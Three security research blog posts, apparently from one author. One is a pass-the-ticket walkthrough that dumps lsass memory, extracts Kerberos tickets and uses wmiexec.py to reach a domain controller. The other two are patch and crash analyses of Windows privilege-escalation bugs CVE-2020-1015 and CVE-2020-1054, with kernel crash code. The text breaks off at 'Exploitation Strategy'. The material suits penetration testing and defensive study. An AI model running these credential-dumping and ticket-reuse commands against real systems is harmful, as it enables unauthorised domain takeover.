0xeb_bp
Practical Guide to Passing Kerberos Tickets From Linux
21 November 2019 at 14:00


The goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash.

This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post.

Tools

To get started we will first need to set up some tools. Each has setup instructions on its GitHub page.

Impacket

https://github.com/SecureAuthCorp/impacket

pypykatz

https://github.com/skelsec/pypykatz

Kerberos Client (optional)

RPM based: yum install krb5-workstation
Debian based: apt install krb5-user

procdump

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

autoProc.py (not required, but useful)

wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

dc01.winlab.com (domain controller)
client01.winlab.com (generic server)

And two domain accounts:

Administrator (domain admin)
User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com.

A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz.

This can be done by uploading procdump64.exe to the target host:

And then run:

procdump64.exe -accepteula -ma lsass.exe output-file

Alternatively we can use autoProc.py, which automates all of this and cleans up the evidence. If using this method, make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107:

python3 autoProc.py domain/user@target

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

And view the available tickets:

Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account!

The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

kirbi2ccache input.kirbi output.ccache

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct (klist is only available if the optional Kerberos client was installed, and is just used as a sanity check):

export KRB5CCNAME=/path/to/.ccache
klist

We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller:

wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn
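The last two steps can be wrapped in a small helper. This is a minimal sketch, assuming wmiexec.py is on the PATH; the helper name, the ccache path, and the IP address are hypothetical placeholders, and only the flags shown above are used. It assembles the command and environment without running anything.

```python
import os

def build_wmiexec_invocation(ccache_path, dc_ip, domain, user, target_fqdn):
    """Return (argv, env) for a Kerberos-authenticated wmiexec.py run.

    Hypothetical helper: it only assembles the command shown above.
    """
    env = dict(os.environ)
    # The ticket cache location is taken from KRB5CCNAME
    env["KRB5CCNAME"] = ccache_path
    argv = [
        "wmiexec.py",
        "-no-pass",          # do not prompt for a password
        "-k",                # authenticate with Kerberos
        "-dc-ip", dc_ip,
        f"{domain}/{user}@{target_fqdn}",   # target must be the FQDN
    ]
    return argv, env

argv, env = build_wmiexec_invocation(
    "/tmp/administrator.ccache",   # placeholder path
    "10.0.0.10",                   # placeholder DC address
    "winlab.com", "Administrator", "dc01.winlab.com")
print(" ".join(argv))
```

The returned pair can be handed to subprocess.run(argv, env=env) once the values match your environment.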

Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

https://www.tarlogic.com/en/blog/how-kerberos-works/

https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

0xeb_bp
CVE-2020-1015 Analysis
12 May 2020 at 14:00


This post is an analysis of the April 2020 security patch for CVE-2020-1015. The bug was reported by Shefang Zhong and Yuki Chen of the Qihoo 360 Vulcan team. The description of the bug from Microsoft:

An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.

Microsoft assigned this bug an exploitability rating of 2. Information pulled from the Microsoft Exploitability Index shows this means an attacker would likely have difficulty creating the code, requiring expertise and/or sophisticated timing, and/or varied results when targeting the affected product.

This bug is likely not an ideal candidate for a fully functioning and reliable exploit, especially considering the other EoPs from the April 2020 security patches with an exploitability rating of 1. In any case, it will be interesting to see why the exploitability rating was assigned, and the root cause of the bug.

The remainder of this post will follow the steps I took to analyze the security patch and put together simple proof of concept code for a working crash.

Patch Diffing Windows 10 1903 umpo.dll

To get started we will first need to grab a patched and non-patched version of the relevant file. While not a foolproof method, searching for “User-Mode Power Service file” points us to umpo.dll. We will focus our efforts on the changes in this dll. A patched version can be grabbed by downloading and extracting the .dll from the relevant KB or from an updated Windows 10 system. The non-patched version can be grabbed from a Windows 10 system prior to updating it with April’s updates.

To perform the patch diff I will use Diaphora. Diaphora shows that two functions have been modified, UmpoRpcLegacyEventRegisterNotification and UmpoNotifyRegister:

A third function, UmpoNotifyUnregister, is unmatched and has been removed from the patched version of umpo.dll.

The names of these modified functions suggest that the vulnerability could be a use after free.

Modified Functions Analysis

Now that the modified functions are known it is time to start reviewing them to identify the bug. Quickly looking at both modified functions reveals that they are not very long. To get an idea of how the functions are called we will check the cross references to each function. There are no cross references from another function to UmpoRpcLegacyEventRegisterNotification. Based on the name it is likely invoked via an RPC call. UmpoNotifyRegister however has one:

UmpoRpcLegacyEventRegisterNotification

We will delve deeper into UmpoRpcLegacyEventRegisterNotification. I prefer to do dynamic analysis whenever possible, so we will fire up WinDbg and put a breakpoint on the target function:

The function declaration:

__int64 UmpoRpcLegacyEventRegisterNotification(__int64 a1, 
                                               __int64 a2, 
                                               const wchar_t *a3, 
                                               int a4)

Since this is likely an RPC call (which we will verify later) we will assume the first argument is the RPC binding handle and ignore it. The arguments appear pretty straightforward:

a3 is a wchar_t which in this case is a service name. a2 is some value that does not point to valid memory so is likely utilized as some constant or identifier. a4 is 0. We will keep track of a4 and see what other potential values it could be. The first section of interesting code marked up with comments is:

  v14 = 0i64;
  v4 = a4;
  v5 = a3;
  v6 = a2;

  // Return if not local client (local RPC only)
  if ( !(unsigned int)UmpoIsClientLocal() )
    return 5i64;

  // Get some object
  v7 = UmpoGetSettingEntry();
  // If not NULL
  if ( v7 )
  {
    // Get another object at v7+32
    v8 = (__int64 *)(v7 + 32);
    // Walk circular linked list until back at head
    for ( i = *v8; (__int64 *)i != v8; i = *(_QWORD *)i )
    {
      // Breaks if object offset 20 == 1 and
      // if object offset 24 == a2
      if ( *(_DWORD *)(i + 20) == 1 && *(_QWORD *)(i + 24) == v6 )
        goto LABEL_11;
    }
    // If not found set i to 0
    i = 0i64;
LABEL_11:
    // If found within circular linked list set v14 to object pointer
    v14 = i;
  }

A reference to an object is obtained by calling UmpoGetSettingEntry(). This object contains the head of a list at offset 32. The list appears to be circularly linked and is walked in a loop. If the entry member at offset 24 is equal to a2 and the entry member at offset 20 is equal to 1, the loop breaks.
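The lookup loop can be modelled in a few lines of Python. This is a minimal sketch of the logic only: the class and function names are hypothetical, and the two fields stand in for the members at offsets 20 and 24 in the decompilation.

```python
class Node:
    """Toy list entry; `flags` and `handle` model offsets 20 and 24."""
    def __init__(self, flags=0, handle=0):
        self.flags = flags
        self.handle = handle
        self.next = self      # a lone node points at itself

def make_list(entries):
    """Build a circular list: head -> entries... -> back to head."""
    head = Node()
    tail = head
    for flags, handle in entries:
        node = Node(flags, handle)
        node.next = head
        tail.next = node
        tail = node
    return head

def find_registrant(head, handle):
    """Walk until back at the head; match on flags == 1 and the handle."""
    node = head.next
    while node is not head:
        if node.flags == 1 and node.handle == handle:
            return node
        node = node.next
    return None   # corresponds to i = 0 in the decompilation

head = make_list([(1, 0x10), (0, 0x20), (1, 0x30)])
print(find_registrant(head, 0x30) is not None)
print(find_registrant(head, 0x20) is not None)
```

The second lookup fails even though the handle is present, because the entry's flags member is not 1.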

The second section of interesting code is:

  // if a4
  if ( v4 )
  {
   // if section 1 code loop does not find anything i is 0
    if ( !i )
      return 0i64;
    // otherwise unregister
    result = UmpoNotifyUnregister(i);
  }
  // if a4 == 0 (our current case)
  else
  {
    if ( i )
      return 0i64;
    // Get sessionID of service
    v10 = WTSGetServiceSessionId();
    // call UmpoNotifyRegister
    result = UmpoNotifyRegister(v12, v11, v10, v6, v5, &v14);
  }

This section reveals the purpose of a4. If a4 is non-zero UmpoNotifyUnregister is called with the address returned from the section one code loop. If a4 is 0 UmpoNotifyRegister is called. For documentation purposes we can reduce this function to:

__int64 UmpoRpcLegacyEventRegisterNotification(
   // RPC Binding Handle
   __int64 a1, 
   // Handle
   __int64 a2, 
   // Service Name
   const wchar_t *a3, 
   // 0 to Register 1 to Unregister
   int a4)

UmpoNotifyRegister

This brings us to the second modified function UmpoNotifyRegister. This function is a bit longer than the previous, but still relatively short. Less relevant sections will be omitted. From our work done reversing the last function we already have a good idea of the arguments:

__int64 __fastcall UmpoNotifyRegister(
    // Set to 0 
    STRSAFE_LPCWSTR pszSrc, 
    // Set to 0 
    __int64 a2, 
    // SessionID
    int a3, 
    // Handle
    __int64 a4, 
    // Service Name
    const wchar_t *pszSrca, 
    // Reference to return to calling function? 
    __int64 *a6)

The first interesting section of the second target function:

  v6 = a4;
  v7 = a3;
  v8 = 0;

  EnterCriticalSection(&UmpoNotification);
  if ( service_name )
  {
    v9 = service_name;
    v10 = 256i64;
    // walk through string until null char is encountered
    // or 256 characters are read
    do
    {
      if ( !*v9 )
        break;
      ++v9;
      --v10;
    }
    while ( v10 );
    // v11 is set to an error code if no null char is found within 256 characters
    v11 = v10 == 0 ? 0x80070057 : 0;
    if ( v10 )
      // v12 set to length of string
      v12 = 256 - v10;
    else
      v12 = 0i64;
  }
  else
  {
    v12 = 0i64;
    v11 = -2147024809;
  }

EnterCriticalSection is called to synchronize shared access to an object. Then service_name (which is our service name argument) is walked until a null character is encountered to determine the length of the string.
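The bounded length scan can be mirrored as follows. This is a sketch under the assumption that the string is a sequence of 16-bit code units ending in 0; the function and helper names are hypothetical. Note that 0x80070057 and -2147024809 are the same 32-bit value (E_INVALIDARG).

```python
E_INVALIDARG = 0x80070057

def encode(text):
    """Hypothetical helper: code units of `text` plus a null terminator."""
    return [ord(ch) for ch in text] + [0]

def bounded_length(units, max_chars=256):
    """Return (hresult, length) following the decompiled do/while loop."""
    if units is None:
        return E_INVALIDARG, 0
    remaining = max_chars
    index = 0
    while remaining:
        if units[index] == 0:      # null char found, stop scanning
            break
        index += 1
        remaining -= 1
    if remaining == 0:             # no terminator within max_chars
        return E_INVALIDARG, 0
    return 0, max_chars - remaining

print(bounded_length(encode("Spooler")))
print(bounded_length(encode("A" * 256)))
```

A name of 255 characters is the longest that passes; 256 or more characters yields the error code and a length of 0.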

The second section is the bulk of the function. It allocates space for a struct that we will call registrant (r for short in the code comments). It turns out that this struct makes up the circular linked list (actually a circular doubly linked list) walked in the for loop in section one of the first function analyzed. The function then populates the new object with the relevant data from our function call arguments, and inserts the object at the front of the list. The struct is defined (Rust syntax) as:

struct registrant {
    // pointer to next
    next: usize,
    // pointer to prev
    prev: usize,
    // set to 1 after alloc
    count: u32, 
    // Flags
    flags: u32, 
    // handle we pass
    handle: usize, 
    // heap alloc which is size of service_name + 2 for null char
    service_name: usize,
    // sessionID
    session_id: u32,
    // unknown, might be two u16s
    unknown: u32,
}
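As a quick sanity check on the layout, the same struct can be expressed with Python's ctypes and compared against the offsets used in the decompiled code and the 48-byte allocation. This is a sketch that assumes a 64-bit target, so every usize is modelled as a 64-bit integer.

```python
import ctypes

class Registrant(ctypes.Structure):
    # usize fields are modelled as 64-bit integers (x64 assumption)
    _fields_ = [
        ("next", ctypes.c_uint64),
        ("prev", ctypes.c_uint64),
        ("count", ctypes.c_uint32),
        ("flags", ctypes.c_uint32),
        ("handle", ctypes.c_uint64),
        ("service_name", ctypes.c_uint64),
        ("session_id", ctypes.c_uint32),
        ("unknown", ctypes.c_uint32),
    ]

for name, _ in Registrant._fields_:
    print("{:<13} +{}".format(name, getattr(Registrant, name).offset))
print("size", ctypes.sizeof(Registrant))
```

The offsets line up with the accesses seen in the two functions: flags at +20, handle at +24, service_name at +32 and session_id at +40.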

With the above struct definition the below code should be relatively straightforward to follow:

 // if no error on service_name length check
 if ( !v11 )
  {
    v13 = (_QWORD *)UmpoGetSettingEntry();
    v11 = 8;
    ...
    // allocate registrant struct memory 48 bytes
    v14 = RtlAllocateHeap(UmpoHeapHandle, 8i64, 48i64);
    v15 = v14;

    // error case on alloc
    if ( !v14 )
      goto LABEL_20;

    v16 = UmpoHeapHandle;
    // r->count is set to 1
    *(_DWORD *)(v14 + 16) = 1;
    // r->prev is set to itself
    *(_QWORD *)(v14 + 8) = v14;
    // r->next is set to itself
    *(_QWORD *)v14 = v14;
    // allocate memory for r->service_name
    v17 = (wchar_t *)RtlAllocateHeap(v16, 8i64, (unsigned int)(2 * v12 + 2));
    // set r->service_name pointer to allocated memory
    *(_QWORD *)(v15 + 32) = v17;

    // error case on alloc
    if ( !v17 )
    {
LABEL_18:
      if ( v15 )
        UmpoDereferenceRegistrant((__int64 *)v15);
LABEL_20:
      if ( v13 && v8 )
        RtlFreeHeap(UmpoHeapHandle, 0i64);
      goto LABEL_21;
    }

    // set r->flags set to 1
    *(_DWORD *)(v15 + 20) = 1;
    // set r->handle to a4 (handle)
    *(_QWORD *)(v15 + 24) = v6;
    // copy func arg service_name into r->service_name
    StringCchCopyW(v17, v12 + 1, pszSrca);
    // umpo!UmpoNotifyRegister+0x111: lea rax, [rsi+20h] 
    v18 = v13 + 4;
    // set r->session_id
    *(_DWORD *)(v15 + 40) = v7;
    // v19 = settingEntry head->next
    v19 = v13[4];
    // check if linked list head->next->prev == head  
    if ( *(_QWORD **)(v19 + 8) == v13 + 4 )
    {
      // inserting at head of list  
      // set r->next to head->next
      *(_QWORD *)v15 = v19;
      // set r->prev to head
      *(_QWORD *)(v15 + 8) = v18;
      // set head->next->prev to r
      *(_QWORD *)(v19 + 8) = v15;
      // set head->next to r
      *v18 = v15;
      // set r+44 to 0
      *(_BYTE *)(v15 + 44) = 0;
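The head insertion, including the head->next->prev sanity check, can be sketched in Python as below. The names are hypothetical, and what the real code does when the check fails is not shown in the excerpt; the sketch simply raises.

```python
class Entry:
    def __init__(self, name):
        self.name = name
        self.next = self     # a fresh entry points at itself,
        self.prev = self     # like the registrant right after allocation

def insert_at_head(head, r):
    first = head.next
    # same check as the decompilation: head->next->prev must be head
    if first.prev is not head:
        raise RuntimeError("list corruption detected")
    r.next = first        # r->next = head->next
    r.prev = head         # r->prev = head
    first.prev = r        # head->next->prev = r
    head.next = r         # head->next = r

def names(head):
    out, node = [], head.next
    while node is not head:
        out.append(node.name)
        node = node.next
    return out

head = Entry("head")
insert_at_head(head, Entry("a"))
insert_at_head(head, Entry("b"))
print(names(head))
```

The most recently registered entry always ends up first, which is why the lookup loop sees new registrants before older ones.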

UmpoNotifyUnregister

The final function change was the removal of UmpoNotifyUnregister. This function calls EnterCriticalSection and then UmpoDereferenceRegistrant. UmpoDereferenceRegistrant performs some error checks, removes the registrant struct from the doubly linked list and frees both heap allocations performed in UmpoNotifyRegister.

Bug Analysis

We now have a good understanding of the modified/removed functions. Let’s look at the April umpo.dll function changes to see if we can spot the security vulnerability. Looking solely at the Diaphora results, it appears that there are quite a few modifications. However, with our new understanding of the code, the modifications essentially boil down to one glaring change from a security perspective. EnterCriticalSection and LeaveCriticalSection have been moved from UmpoNotifyRegister to UmpoRpcLegacyEventRegisterNotification. Critical sections are used to synchronize simultaneous access to a shared object within a process. Errors in synchronizing access to shared data produce bugs. Conspicuously, EnterCriticalSection is moved right above the call to UmpoGetSettingEntry (section one of the first function analyzed).

At this point the bug is becoming apparent. UmpoGetSettingEntry returns a global variable which contains a pointer to the head of our doubly circular linked list of registrant objects. The non-patched code does not correctly synchronize access to this object. This error results in a race condition.

Race conditions are bugs, but in a sense are not directly exploitable. Rather, they provide a pathway to a security violation. Initially, the race must be won, which allows the security violation. The violation then must be taken advantage of. With this in mind, let’s think of how this race condition can be taken advantage of. As mentioned earlier, the names of the modified functions evoke the use after free vulnerability class. Following this line of thought, it is straightforward to imagine a scenario where the race condition results in a use after free. Take for example the following scenario with two threads:

Thread 1 enters UmpoRpcLegacyEventRegisterNotification.
Thread 1 accesses linked list registrant shared object.
Thread 1 obtains pointer to target registrant struct.
Thread 1 enters UmpoNotifyUnregister.
Thread 2 enters UmpoRpcLegacyEventRegisterNotification.
Thread 1 enters UmpoDereferenceRegistrant.
Thread 2 accesses linked list registrant shared object.
Thread 2 obtains pointer to target registrant struct.
Thread 1 frees registrant struct memory.

At this point the thread 2 pointer to the target registrant struct is dangling.
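The interleaving above can be replayed deterministically with a toy model. This is only an illustrative sketch: the allocator is hypothetical and hands freed slots straight back out, which a real heap does not guarantee, and the "threads" are just sequential steps in the order listed.

```python
class ToyHeap:
    """Tiny allocator model: freed addresses are reused first."""
    def __init__(self):
        self.live = {}
        self.free_list = []
        self.next_addr = 0x1000

    def alloc(self, value):
        if self.free_list:
            addr = self.free_list.pop()
        else:
            addr = self.next_addr
            self.next_addr += 0x30      # 48-byte slots
        self.live[addr] = value
        return addr

    def free(self, addr):
        del self.live[addr]
        self.free_list.append(addr)

def run_interleaving():
    heap = ToyHeap()
    registrants = [heap.alloc({"handle": 0x1234})]   # shared list

    def lookup(handle):
        for addr in registrants:
            if heap.live[addr]["handle"] == handle:
                return addr
        return None

    t1 = lookup(0x1234)          # thread 1 obtains the pointer
    t2 = lookup(0x1234)          # thread 2 obtains the same pointer
    registrants.remove(t1)       # thread 1 unlinks the registrant ...
    heap.free(t1)                # ... and frees it
    dangling = t2 not in heap.live
    heap.alloc(b"A" * 48)        # a same-sized allocation reclaims the slot
    return t2, dangling, heap.live[t2]

t2, dangling, reclaimed = run_interleaving()
print(hex(t2), dangling, reclaimed[:8])
```

After the reclaim, thread 2's stale pointer refers to attacker-chosen bytes rather than a registrant struct.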

Exploitation PoC to Trigger Crash

To verify that the bug analysis is accurate we must write a simple PoC to trigger the race condition and use after free. Based on the name of UmpoRpcLegacyEventRegisterNotification we have previously assumed that this function is invoked via RPC. To verify this we will use the extremely useful tool NtObjectManager written by James Forshaw.

After importing the NtObjectManager module we can run the below command (more information on this tool here and here):

This provides all RPC functions we can call from umpo.dll. Reviewing the output we see our function:

HRESULT UmpoRpcLegacyEventRegisterNotification(
    /* Stack Offset: 0 */ handle_t p0, 
    /* Stack Offset: 8 */ [In] UIntPtr p0, 
    /* Stack Offset: 16 */ [In] /* FC_SUPPLEMENT FC_C_WSTRING Range(0, 256) */ 
    wchar_t* p1, 
    /* Stack Offset: 24 */ [In] int p2);

We will take all the output from the tool and use that to create our .idl file to make the RPC call. The crash PoC is very simple and the code is available here. The necessary RPC binding initialization is set up and two threads are started.

Thread one repeatedly registers a registrant struct. Thread two randomly flips between registering and unregistering. The service_name argument to UmpoRpcLegacyEventRegisterNotification is set up to be the same size heap allocation as the registrant struct itself (48 bytes) to populate the freed memory. After running the crash code for a bit we get a crash!

The crash occurs in UmpoRpcLegacyEventRegisterNotification referencing the invalid memory 41414141`41414155, which is our data.

Thanks to Shefang Zhong, Yuki Chen, and James Forshaw for providing tools and knowledge that greatly helped:

tiraniddo

0xeb_bp
CVE-2020-1054 Analysis
15 June 2020 at 14:00


This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20 Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.

The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).

The Crash

Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances, however I found it unnecessary in this case.

The provided crash code:

int main(int argc, char *argv[])
{
    LoadLibrary("user32.dll");
    HDC r0 = CreateCompatibleDC(0x0);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will 
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc, 
        0x0, 0x0, 0x6);

    return 0;
}

Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.

My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced 
    the bad memory address.
Arg4: 0000000000000005, (reserved)

Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
 r8=00000000000008f0  r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36   mov esi,dword ptr [r14] ds:00000000`00000000=????????

STACK_TEXT:  
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)

The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:

It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. CheckPoint Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.

I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write. Note that the value c7000240 will be referenced throughout the blog post. This value changes across system reboots and sometimes per program execution; for the sake of continuity it will be kept the same here.

Controlling OOB Write

The first goal is to understand how the address fffff904'c7000240 can be controlled, which will be referred to as oob_target. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:

Working further backwards rcx is initialized in one of the first basic blocks of vStrWrite01. After that, rcx is manipulated in a loop:

A constant value is added to rcx on each pass through the loop. In the assembly this is add ecx, eax. A pseudo-code loop snippet:

var_64h = 0x7fffffff; 
var_6ch = 0x80000000;
while ( r11d )
{
    --r11d;
    if ( ebp >= var_6ch && ebp < var_64h )
    {
        // oob read/write in here
    }
    ++ebp;
    ecx += eax;
}

With this information a rough formula arises for oob_target:

oob_target = initial_value + loop_iterations * eax

The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:

mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]

ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0  fff2aaab 0006aaab

fff2aaab is not identical to arg5 of DrawIconEx, but it looks related. Changing arg5 from 0xfebffffc to 0xfebffffd:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0  fff2aaac 0006aaaa

The result is fff2aaac. This indicates that it is related.

Altering arg5 and observing the changes to oob_target provides additional insight.

If arg5 = 0xff000000 there is a minor change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240  ????????`???????? ????????`????????

If arg5 = 0xfd000000 there is a major change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240  ????????`???????? ????????`????????

Interestingly, no matter the value of arg5 the lower 32 bits of oob_target remain c7000240. Additionally, a decrease in the value of arg5 (treating it as unsigned) results in an increase in oob_target.

eax in the oob_target formula is set via an offset from r15:

Offsets from r15 are commonly used in the beginning of vStrWrite01. This indicates that r15 could contain the address to some structure. In the second basic block of the function r15 is set as follows:

mov r15, r8 // r8 is still arg2 here

r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:

The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times. This is the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.

The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjacent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SURFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.

The next step, however, is to fully understand how loop_iterations from the oob_target formula is controlled via arg5 of DrawIconEx. Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The notes.txt file in my GitHub repo contains extra detail on the relevant function, vInitStrDDA.

DrawIconEx arg5’s control of loop_iterations is determined by the following formula (written in Python):

# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500

loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30

lDelta = arg1 // 8

oob = loop_iterations * lDelta     
upper32_inc = oob & 0xffffffff00000000

print("loop_iterations          = %x" % loop_iterations)
print("lDelta                   = %x" % lDelta)
print("upper 32 inc.            = %x" % upper32_inc)

What was discovered was that arg1 of CreateCompatibleBitmap and arg5 of DrawIconEx directly control the values of both loop_iterations and lDelta. However, the lower 32 bits of oob_target always remain the same. This means only the upper 32 bits of the write address are controllable.
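The formula can be checked against the three WinDbg observations from earlier (arg5 values 0xfebffffc, 0xff000000 and 0xfd000000, all with a bitmap width of 0x51500). This is a small sketch; the function name is hypothetical and the base upper dword 0xfffff900 is taken from the dumps in this post, so it will differ on other systems.

```python
def upper32_increment(arg5, bitmap_width):
    """Upper-dword increment of oob_target for given arguments."""
    loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30
    lDelta = bitmap_width // 8
    return (loop_iterations * lDelta) >> 32

BASE_UPPER = 0xfffff900   # upper dword of the base bitmap in this post

for arg5 in (0xfebffffc, 0xff000000, 0xfd000000):
    inc = upper32_increment(arg5, 0x51500)
    print("arg5=%08x -> %08x'c7000240" % (arg5, BASE_UPPER + inc))
```

The three results are fffff904, fffff903 and fffff90a, matching the addresses seen in the debugger.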

The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01 two writes can be performed:

// write 1
win32k!vStrWrite01+0x417
mov     dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov     dword ptr [r14],esi

The content of esi is determined by either of the following:

esi is either bitwise OR’d or bitwise AND’d with some value.

Running the crash code calls DrawIconEx as:

DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
        0x0, 0x0, 0x6);

Using this call to DrawIconEx the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of DrawIconEx stands out to me. The current call sets this parameter to 0x6. Reviewing the documentation for this flag shows that 0x6 is DI_COMPAT | DI_IMAGE; DI_COMPAT is ignored, so this is effectively DI_IMAGE, which “Draws the icon or cursor using the image”. The flag DI_MASK sounds promising, and sure enough setting diFlags (arg8) to 0x1 changes execution flow to the OR branch.
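For reference, the diFlags bits can be decoded with a few lines of Python. The constant values are the ones defined in winuser.h; the helper name is hypothetical.

```python
DI_MASK = 0x0001
DI_IMAGE = 0x0002
DI_NORMAL = 0x0003    # DI_IMAGE | DI_MASK
DI_COMPAT = 0x0004    # documented as ignored

def describe_di_flags(flags):
    """Return the names of the individual bits set in diFlags."""
    names = []
    if flags & DI_MASK:
        names.append("DI_MASK")
    if flags & DI_IMAGE:
        names.append("DI_IMAGE")
    if flags & DI_COMPAT:
        names.append("DI_COMPAT")
    return names

print(describe_di_flags(0x6))   # value used by the crash code
print(describe_di_flags(0x1))   # value that reaches the OR branch
```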

Exploitation Strategy

